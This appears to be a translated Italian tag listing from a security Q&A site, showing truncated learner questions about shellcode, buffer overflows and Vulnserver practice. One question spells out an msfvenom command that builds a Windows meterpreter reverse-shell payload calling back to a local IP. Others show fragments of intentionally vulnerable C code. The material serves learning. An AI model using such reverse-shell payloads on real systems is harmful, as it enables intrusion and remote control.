Domande con tag 'shellcode'

1
risposta

Errore di segmentazione nello shellcode

Ho generato un codice shell con msfvenom # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=7878 -f c -o shell.c Quando compilo il mio shell.c con gcc (versione 6.3.0-16) con questa opzione: # gcc -o shell shell.c # gc...
posta 12.05.2017 - 01:28
1
risposta

Meterpreter & Vuln Server

Apprendo Shellcode e utilizzo Vulnserver.exe. Sono riuscito ad arrivare al punto di iniettare uno shellcode come aprire una calcolatrice o un msgbox Ma per qualche ragione la shell di bind sulla porta 4444 non funziona per me. Ecco il codice...
posta 14.04.2017 - 20:02
1
risposta

Problemi di test del buffer overflow

Sto sperimentando sul mio computer, quindi ho scritto un programma vulnerabile in C per testare i buffer overflow su: #include <stdio.h> #include <string.h> #include <stdlib.h> int check_password(char *password){ int ret...
posta 07.12.2016 - 05:38
1
risposta

Specificatore di formato MSFvenom

In msfvenom, cosa significa esattamente quando specificherò il formato in C o Python? E qual è il formato 'raw' per? Lo so, quando il formato è psh-cmd viene eseguito nel prompt dei comandi, e quando è exe viene eseguito come un normale eseguibi...
posta 24.09.2016 - 21:35
1
risposta

Possibile shellcode spedito a me

Quando ho aperto la mia email questa mattina ho trovato un messaggio piuttosto strano nella mia casella di posta elettronica. Non sembrava la tua e-mail di spam ogni giorno dato che sembrava una stringa codificata in base64 e nient'altro. Ecco u...
posta 23.04.2015 - 10:36
1
risposta

Come negare l'esecuzione della shell in tutte le sottodirectory?

Voglio nginx per negare agli utenti che hanno cartelle all'interno / webroot / upload per es. /webroot/uploads/user1 /webroot/uploads/user2 /webroot/uploads/user999 per eseguire qualsiasi shell (php, pl, py, binary). Le shell sono spe...
posta 21.01.2014 - 22:34
1
risposta

Avvio di una nuova shell in un exploit strcpy utilizzando l'overflow del buffer

Sto imparando i buffer overflow e ho questo codice vulnerabile che sto provando ad avviare una shell da: #include <string.h> void myfunction(char *arg); int main(int argc, char **argv) { myfunction(argv[1]); return 0; } void...
posta 26.11.2013 - 23:25
0
risposte

Errore di segmentazione nel programma di esercizi

Sto analizzando questo video sui buffer overflow, ma ho qualche problema a replicare la demo. Il problema è che sto ricevendo un errore di segmentazione quando mi aspetto di ottenere una shell alla fine. L'idea è che il programma HackYou...
posta 25.10.2018 - 13:40
0
risposte

Esperimento di overflow del buffer: codice shell eseguito ma errore "impossibile leggere 0 byte"

Ho fatto un esperimento di overflow del buffer su una VM di Ubuntu 16.04 ( Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux ) e ho ottenuto un errore sconcertante dopo aver ese...
posta 30.07.2018 - 01:15
0
risposte

Non in grado di eseguire lo shellcode iniettato

#include <stdio.h> void secret() { printf("Congratulations!\n"); } void echo() { char array[60]; scanf("%s", array); printf("You entered: %s\n", array); } int main() { echo(); return 0; } sopra è il codice...
posta 29.08.2018 - 11:29